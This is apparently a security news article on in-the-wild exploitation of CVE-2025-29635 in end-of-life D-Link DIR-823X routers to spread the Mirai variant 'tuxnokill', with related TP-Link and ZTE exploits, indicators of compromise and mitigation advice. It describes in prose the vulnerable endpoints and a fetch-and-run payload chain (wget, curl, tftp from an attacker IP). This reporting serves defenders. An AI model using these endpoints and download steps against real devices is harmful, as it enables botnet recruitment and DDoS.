Threat actors are actively exploiting a command injection vulnerability in discontinued D-Link DIR-823X routers to deploy a Mirai botnet variant dubbed “tuxnokill” and organizations still running these legacy devices are directly in the crosshairs.
CVE-2025-29635: Mirai Botnet Hits Retired D-Link
CVE-2025-29635 is a command injection vulnerability (CWE-77) residing in D-Link DIR-823X series routers running firmware versions 240126 and 240802.
The flaw allows an authorized attacker to execute arbitrary operating system commands on a remote device by sending a specially crafted HTTP POST request to the /goform/set_prohibiting endpoint.
Discovered and reported the vulnerability in early 2025, reverse-engineering the sub_42232C function in the router’s binary. They found that the value of the macaddr parameter is copied into a command buffer via the snprintf function, after which system() is called giving an attacker direct shell access by maliciously crafting the macaddr value.
The vulnerability was publicly disclosed in late March 2025, and a proof-of-concept (PoC) exploit was briefly published on GitHub before being removed.
Critically, these routers were officially retired by D-Link in September 2025, meaning no patch will ever be issued for this flaw. As of this writing, CVE-2025-29635 has not yet been added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog but active exploitation has now begun.
Active Exploitation in March 2026
The security team first observed active exploitation attempts targeting CVE-2025-29635 in its global honeypot network in early March 2026.
This marks the first confirmed in-the-wild exploitation since the CVE’s initial disclosure over a year earlier a classic example of “slow burn” threat actor adoption of public PoC exploits.
The observed exploitation payload deviates from the original PoC in significant ways. The attacker’s HTTP POST request omits standard headers such as Referer and Accept-Language, and provides no session authentication tokens.
The malicious payload is injected not under the expected macaddr field but under an arbitrary parameter named parameter suggesting the router’s firmware fails to validate which form field maps to the macaddr command buffer.
This means the router copies any key-value pair from the POST body directly into the command buffer without proper field-name verification, making the attack trivially flexible.
The payload chain follows a well-known multi-stage delivery pattern: it attempts to cd into writable directories (/tmp, /var/run, /root), then downloads a shell script (dlink.sh) from attacker-controlled IP 88.214.20[.]14 via wget, curl, and tftp, before making it executable and running it.
The “tuxnokill” Mirai Variant
The downloaded shell script fetches and executes a Mirai malware payload named “tuxnokill”, which supports multiple CPU architectures a hallmark of botnets targeting the diverse IoT ecosystem. FortiGuard Labs has also confirmed the attack pattern targeting these exact firmware versions.
Key technical characteristics of the tuxnokill malware include:
- XOR encoding with a decryption key of
0x30, consistent with Mirai source-code derivatives - Hard-coded C2 server:
64.89.161[.]130on port44300 - Hard-coded downloader IP:
88.214.20[.]14 - Mirai signature string:
"segmentation fault (core dumped)"a standard console execution string in Mirai payloads - Anti-AI string:
"AI.NEEDS.TO.DIE"hard-coded in the binary, suggesting the threat actor coded the payload manually rather than using AI-assisted development
The malware supports an extensive suite of DDoS attack commands, including TCP STOMP, TCP ACK, TCP SYN, UDP DNS, UDP PLAIN, GRE ETH, HTTP NULL, XMAS, and RAW flood attacks giving the operator a versatile arsenal for volumetric attacks.
TP-Link and ZTE Also Targeted
This threat actor is not limiting their operations to D-Link infrastructure. A recorded of simultaneous exploitation attempts against two additional vulnerability classes from the same attacker IP:
- CVE-2023-1389 – A known command injection flaw in TP-Link Archer AX21 routers, exploited via the
/cgi-bin/luci/;stok=/local?form=countryendpoint - ZTE ZXV10 H108L RCE – A remote code execution exploit targeting ZTE routers via the
/manager_dev_ping_tendpoint on port 8083
All three attack chains download payloads from the same IP (88.214.20[.]14), confirming this is a single coordinated threat actor running a multi-platform botnet recruitment campaign.
Defenders should immediately block or alert on the following indicators:
| IOC Type | Value |
|---|---|
| Malicious IP (Downloader) | 88.214.20[.]14 |
| Malicious IP (C2) | 64.89.161[.]130 |
| C2 Port | 44300 |
| SHA256 Hash | 32ca4b70e84787144574bfdb85a0092f3ebf524bb78febdd28d4c832b53fe100 |
| SHA256 Hash | be902e86ec68515e23a3387a21e80d098d258223ce562598c27ee6d89b83ff2b |
| SHA256 Hash | d232c0960f24ba4bb369821b1bf2836d9e576a34fa3ddca2618c80b2f54277f7 |
| SHA256 Hash | 7792f5c1d5c6c6415732ba0f63328549e19cc9c182c258c17b97b77fdb5541b8 |
| SHA256 Hash | 72eff03b8573329818b38185074aa763e99d15f5709fecc44f9afece21dc06d8 |
Akamai has published Snort rules (SID: 2000003) and YARA rules detecting the above strings and IPs across network traffic and scanned binaries.
Mitigation and Recommendations
Organizations should take the following steps immediately:
- Replace D-Link DIR-823X routers immediately no firmware patch exists or will be issued for this end-of-life device
- Block outbound connections to
88.214.20[.]14and64.89.161[.]130at the firewall level - Deploy the Akamai YARA and Snort rules to detect tuxnokill infections in your environment
- Audit legacy router inventory and prioritize replacement of any EOL networking hardware with internet exposure
- Monitor
/goform/endpoints on network devices for anomalous POST requests - Apply CVE-2023-1389 patches to all TP-Link Archer AX21 devices if not already done
The pattern here is familiar: a public PoC sits dormant, EOL devices remain deployed, and eventually a botnet operator weaponizes the exploit at scale.
The low barrier to entry in the ecosystem where source code has been public since 2016 means even technically unsophisticated actors can run large-scale DDoS infrastructure.
FAQ
Q1: Is CVE-2025-29635 patched?
No, D-Link officially retired the DIR-823X series in September 2025, so no patch will ever be released; immediate device replacement is the only fix.
Q2: What does the tuxnokill malware do?
It recruits compromised routers into a Mirai-based DDoS botnet capable of launching TCP, UDP, HTTP, and GRE flood attacks against targets worldwide.
Q3: Do attackers need valid credentials to exploit CVE-2025-29635?
While the CVE technically requires an “authorized attacker,” active exploits observed omit authentication tokens entirely, suggesting the firmware does not enforce credential validation.
Q4: Is this vulnerability in CISA’s KEV Catalog?
As of April 2026, CVE-2025-29635 has not been added to CISA’s Known Exploited Vulnerabilities Catalog, though active exploitation has now been confirmed.
Site: thecybrdef.com
About the Author
